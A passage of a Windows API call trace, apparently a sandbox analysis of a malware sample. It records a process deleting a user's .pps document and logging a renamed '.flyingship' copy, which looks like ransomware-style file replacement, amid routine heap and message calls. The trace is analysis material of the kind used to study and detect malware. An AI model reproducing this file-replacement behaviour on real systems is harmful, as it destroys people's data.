HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4787dab0, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2d78f050, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0xfa78e40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x9094, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="isuTz.pps", cAlternateFileName="")) returned 0x90ae18 [0178.383] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\isutz.pps")) returned 1 [0178.386] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4787dab0, ftCreationTime.dwHighDateTime=0x1d5e1ba, ftLastAccessTime.dwLowDateTime=0x2d78f050, ftLastAccessTime.dwHighDateTime=0x1d5e025, ftLastWriteTime.dwLowDateTime=0xfa78e40, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x9094, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="isuTz.pps", cAlternateFileName="")) returned 0 [0178.387] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0178.387] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.388] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.388] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.388] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pps", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.388] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pps", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.388] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.388] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.388] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.388] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0178.388] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.390] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.390] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0178.390] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.390] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.390] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0178.391] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.391] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.391] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0178.391] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x18a0, lpOverlapped=0x0) returned 1 [0178.392] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0178.392] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x18a0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.392] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0178.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0178.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0178.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.flyingship.pps\r\n", cchWideChar=79, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 79 [0178.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4f) returned 0x923b28 [0178.392] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.flyingship.pps\r\n", cchWideChar=79, lpMultiByteStr=0x923b28, cbMultiByte=79, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\isuTz.flyingship.pps\r\n", lpUsedDefaultChar=0x0) returned 79 [0178.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0178.392] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0178.392] WriteFile (in: hFile=0x138, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4e, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4e, lpOverlapped=0x0) returned 1 [0178.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0178.393] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0178.393] CloseHandle (hObject=0x138) returned 1 [0178.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0178.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0178.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0178.403] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0178.403] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0178.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0178.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.405] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0178.405] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.405] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.405] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda80 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.405] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0178.406] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0178.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0178.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0178.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.406] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.406] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.407] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.407] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0178.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0178.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0178.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0178.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0178.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.408] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0178.408] RtlAllocateHeap (HeapHandle=0x8a0000, 